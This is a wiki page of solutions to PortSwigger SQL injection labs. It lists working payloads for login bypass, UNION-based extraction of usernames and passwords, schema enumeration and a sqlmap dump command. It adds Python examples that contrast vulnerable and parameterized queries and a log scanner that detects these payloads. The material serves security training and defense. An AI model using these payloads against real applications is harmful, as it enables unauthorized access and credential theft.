SQL injection - gachikuku/portswigger GitHub Wiki

Apprentice lab:
SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

  • Solution

    1. Select a category.
    2. Test by adding a ' at the end. The server returns status code 500 (internal error).
    3. Adding -- at the end of the query resolves the internal error, and nothing is displayed.
    4. Picture the resulting SQL query and modify it by also adding an always-true condition, giving the following:
      ' OR 1=1 --
      

Apprentice lab:
SQL injection vulnerability allowing login bypass

This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

  • Solution

    1. Try logging in as wiener:peter.
    2. Try logging in as administrator but with a ' appended. Notice the 500 internal error code, which hints that an SQL query is taking place server-side.
    3. The username and password fields are combined into an SQL query.
    4. Picture the query, then put administrator in the username field and ' or 1=1 -- in the password field.

NOTE:
' closes the string so we are able to tinker with the query.
-- is always added at the end so everything to its right is commented out.
A truthy value is added for the query logic: something OR something that is always true, like (1=1).
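Added example, not from the labs or from these notes: the shape of the vulnerable queries behind the two labs above, run against a constructed in-memory SQLite database, next to the parameterized form that defeats the same inputs. Table names, rows and the status_for helper are assumptions made for the example.

```python
import sqlite3

# Constructed in-memory database standing in for the lab's backend;
# the tables and rows are assumptions, not the lab's real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1);
        INSERT INTO products VALUES ('Unreleased Gadget', 'Gifts', 0);
        INSERT INTO products VALUES ('Cat Toy', 'Pets', 1);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-admin-secret');
        INSERT INTO users VALUES ('wiener', 'peter');
    """)
    return conn

# Vulnerable: the user-controlled category is pasted into the SQL text, so a
# quote in the input ends the string literal and the rest is parsed as SQL.
def products_vulnerable(conn, category):
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return [row[0] for row in conn.execute(sql)]

# Hardened: the category travels as a bound parameter. The driver never
# re-parses it as SQL, whatever characters it contains.
def products_safe(conn, category):
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]

# Same pair for the login form: both fields are concatenated into one query.
def login_vulnerable(conn, username, password):
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Mirrors the status codes seen in the lab: a syntax error from the database
# surfaces as a 500, a query that parses returns 200.
def status_for(conn, category):
    try:
        products_vulnerable(conn, category)
        return 200
    except sqlite3.OperationalError:
        return 500

if __name__ == "__main__":
    db = make_db()
    print(status_for(db, "Gifts'"))                 # 500: unterminated string literal
    print(status_for(db, "Gifts' --"))              # 200: the comment swallows the rest
    print(products_vulnerable(db, "' OR 1=1 --"))   # every product, released or not
    print(products_safe(db, "' OR 1=1 --"))         # []: treated as a literal category name
    print(login_vulnerable(db, "administrator", "' or 1=1 --"))  # a user, without the password
    print(login_safe(db, "administrator", "' or 1=1 --"))        # None
```

The bare-quote probe raises a database error (the 500 from step 2), appending -- makes the statement parse again (step 3), and the always-true condition widens the WHERE clause so unreleased rows come back. The parameterized functions receive exactly the same strings and simply find no matching category or user.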

union-attacks

Practitioner lab:
SQL injection UNION attack, determining the number of columns returned by the query

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

  • Solution

    1. Select a category.
    2. Adding a ' causes an internal error.
    3. Use ' order by N --, increasing N, to find out the number of columns.
    4. Then use the last number before the error as the number of nulls:
      ' union select null, null, ..., null --
      

Practitioner lab:
SQL injection UNION attack, finding a column containing text

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

  • Solution

    1. Try order by to find out the number of columns.
    2. After that use ' union select null, null, null --, replacing each null in turn with a value of the data type of interest (here, a string).

Practitioner lab:
SQL injection UNION attack, retrieving data from other tables

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

  • Solution

    1. Select a category.
    2. Type ' union select username, password from users --.
    3. Log in as administrator.

Practitioner lab:
SQL injection UNION attack, retrieving multiple values in a single column

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

  • Solution

    1. Select a category and try ' -- to observe an internal error.
    2. Find out how many columns there are by using ' union select null from users --.
    3. Afterwards determine the data type of each column: ' union select null, 'a' from users --.
    4. z3nsh3ll has a nice explanation of how the final payload can be derived.
    5. Alternatively, two payloads can be used.
      1. For usernames
      ' union select null, username from users --

      2. For passwords
      ' union select null, password from users --

    6. Combining the two:
      ' union select null, username || '-' || password from users --
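Added example, not part of the original notes: the column-count and UNION mechanics from the labs above, replayed against a constructed two-column SQLite query. The schema, rows and helper names are assumptions. One caveat: SQLite is dynamically typed, so the "which column accepts text" probe from step 3 always succeeds here; on PostgreSQL or Oracle a string in an integer column raises an error, which is what the lab relies on.

```python
import sqlite3

# Constructed stand-in for the lab's product listing. Schema and rows are
# assumptions; what matters is that the filter query returns two columns.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES ('Mug', 5, 'Gifts');
        INSERT INTO products VALUES ('Cat Toy', 7, 'Pets');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-admin-secret');
        INSERT INTO users VALUES ('wiener', 'peter');
    """)
    return conn

# Vulnerable filter: the category is concatenated into the query, and the
# two selected columns are exactly what the page renders.
def run_filter(conn, category):
    sql = f"SELECT name, price FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()

def column_count(conn, limit=10):
    # ORDER BY n is accepted while n is a valid column position and errors
    # once it is not, so the last n that worked is the column count.
    last_ok = 0
    for n in range(1, limit + 1):
        try:
            run_filter(conn, f"' ORDER BY {n} --")
            last_ok = n
        except sqlite3.OperationalError:
            break
    return last_ok

def null_row(conn, n):
    # A UNION only parses when both sides have the same number of columns;
    # NULL is compatible with every column type, hence the all-NULL row.
    nulls = ", ".join(["null"] * n)
    return run_filter(conn, f"' UNION SELECT {nulls} --")

def wrong_width_rejected(conn, n):
    # True when a UNION with n columns is rejected by the database.
    try:
        null_row(conn, n)
        return False
    except sqlite3.OperationalError:
        return True

def two_values_in_one_column(conn):
    # When only one rendered column is text-friendly, two fields are joined
    # with a separator so both land in that single column.
    rows = run_filter(conn, "' UNION SELECT username || '-' || password, null FROM users --")
    return [row[0] for row in rows if row[1] is None]

if __name__ == "__main__":
    db = make_db()
    print(column_count(db))                 # 2
    print(null_row(db, 2))                  # [(None, None)]
    print(wrong_width_rejected(db, 1))      # True: column counts must match
    print(two_values_in_one_column(db))     # ['administrator-constructed-admin-secret', 'wiener-peter']
```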
      

examining-the-database

Practitioner lab:
SQL injection attack, querying the database type and version on MySQL and Microsoft

  • Solution

    1. Take care how # gets represented: URL-encode it! Also encode <space>.
      echo -n '#' | jq -sRr @uri
    2. Check the number of columns with ' union select null,.. %23
    3. Get the version.
      ' union select null, @@version %23

Practitioner lab:
SQL injection attack, listing the database contents on non-Oracle databases

  • Solution

    1. Payload crafting: Finding out if injectable
      '  --
      
    2. Payload crafting: Find out how many columns
      ' union select null, null --
      
    3. Payload crafting: table_name from information_schema.tables.
      ' union select null, table_name from information_schema.tables --
      
    4. Payload crafting: Ctrl+F for "users" to find the users table. Now find out its columns
      ' union select null, column_name from information_schema.columns where table_name='users_ghghek'--
      
    5. Payload crafting: using the information revealed.
      ' union select username_hsdiwb, password_beeklh from users_ghghek--
      

[NOTE]
When making an SQL query, use SINGLE quotes, not double.
Trying both is encouraged though.
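Added example (not from the notes): why the # in the version lab must be URL-encoded, shown with Python's urllib instead of jq. The host name is a placeholder. An unencoded # starts the URL fragment, which the browser never sends, so the server sees a truncated parameter; %23 survives the trip and decodes back to #.

```python
from urllib.parse import urlsplit, parse_qs, quote

def encode_payload(payload):
    # Percent-encode every reserved character: '#' becomes %23, ' ' becomes %20,
    # "'" becomes %27. safe="" stops quote() from leaving '/' alone.
    return quote(payload, safe="")

def server_sees(url):
    # What the application receives as the category parameter. urlsplit()
    # behaves like a client: everything from an unencoded '#' is the fragment
    # and is dropped before the request goes out.
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    return params.get("category", [""])[0]

if __name__ == "__main__":
    base = "https://lab.example/filter?category="        # placeholder host
    raw = "Gifts' union select null, @@version #"
    print(server_sees(base + raw))                        # comment character lost
    print(server_sees(base + encode_payload(raw)))        # full value, '#' intact
    print(encode_payload("#"))                            # %23, same as the jq one-liner
```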

blind

Practitioner lab:
Blind SQL injection with conditional responses

  • Solution (sqlmap)

    1. Consulting HackTricks
      sqlmap -u "https://uuid.web-security-academy.net/filter?category=Pets" --cookie "TrackingId=*" --dump
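Added example, not from the notes or from sqlmap: detection logic for the payload shapes on this page (quote plus tautology, ORDER BY and UNION probes, @@version, information_schema, a conditional SUBSTRING in the TrackingId cookie, and a sqlmap User-Agent) run over constructed access-log lines. The log format, client addresses and the "sqlmap/1.x" User-Agent string are assumptions made for the example; findings are grouped per client so a probing session stands out from normal traffic.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines (not lab traffic), in the shape:
#   client method path "Cookie header" "User-Agent"
LOG_LINES = [
    '10.0.0.5 GET /filter?category=Gifts "TrackingId=abc123" "Mozilla/5.0"',
    '10.0.0.9 GET /filter?category=%27%20OR%201%3D1%20-- "TrackingId=abc123" "Mozilla/5.0"',
    '10.0.0.9 GET /filter?category=Gifts%27%20order%20by%203%20-- "TrackingId=abc123" "Mozilla/5.0"',
    '10.0.0.9 GET /filter?category=%27%20union%20select%20null%2C%20%40%40version%20%23 "TrackingId=abc123" "Mozilla/5.0"',
    '10.0.0.9 GET /filter?category=Pets "TrackingId=abc123\' AND SUBSTRING(password,1,1)=\'a" "Mozilla/5.0"',
    '10.0.0.9 GET /filter?category=Pets "TrackingId=abc123" "sqlmap/1.x"',
    '10.0.0.7 GET /filter?category=Gifts%20%26%20Toys "TrackingId=zzz999" "Mozilla/5.0"',
]

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$')

# Indicators drawn from the payload shapes in the notes above, matched
# case-insensitively against each decoded parameter or cookie value.
INDICATORS = {
    "tautology":       re.compile(r"'\s*or\b\s+\S+\s*=\s*\S+", re.I),
    "union_select":    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe":  re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_enum":     re.compile(r"\binformation_schema\b", re.I),
    "version_probe":   re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "blind_condition": re.compile(r"'\s*and\s+\S*(substr|substring|ascii|length)\s*\(", re.I),
    "comment_tail":    re.compile(r"(--|#)\s*$"),
}

def decoded_values(line):
    """Yield (client, vector, decoded value) for every query parameter,
    cookie and the User-Agent of one log line."""
    m = LINE_RE.match(line)
    if not m:
        return
    client, _, path, cookies, user_agent = m.groups()
    # parse_qsl splits on '&' before decoding, so an encoded %26 stays inside its value
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        yield client, "query", value
    for cookie in cookies.split(";"):
        if "=" in cookie:
            yield client, "cookie", unquote_plus(cookie.split("=", 1)[1].strip())
    yield client, "user_agent", user_agent

def scan(lines):
    """Return (client, vector, indicator, value) for every indicator hit."""
    findings = []
    for line in lines:
        for client, vector, value in decoded_values(line):
            if vector == "user_agent":
                if "sqlmap" in value.lower():
                    findings.append((client, vector, "scanner_ua", value))
                continue
            for name, pattern in INDICATORS.items():
                if pattern.search(value):
                    findings.append((client, vector, name, value))
    return findings

def clients_by_hits(findings):
    """Hits per client: one noisy source with many indicators is the usual signature."""
    return Counter(client for client, _, _, _ in findings)

if __name__ == "__main__":
    hits = scan(LOG_LINES)
    for finding in hits:
        print(finding)
    print(clients_by_hits(hits))   # only 10.0.0.9 appears
```

Decoding before matching is the important step: the %23 from the previous section and the %27 that carries the quote are invisible to a regex run on the raw request line. The Gifts & Toys request from 10.0.0.7 shows the other side of that: legitimate encoded characters decode to harmless text and produce no finding.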
      

Practitioner lab:
Blind SQL injection with out-of-band interaction (Pro)


Practitioner lab:
Blind SQL injection with out-of-band data exfiltration (Pro)


Tip

When crafting payloads, PortSwigger's cheat sheet can be used as a reference.
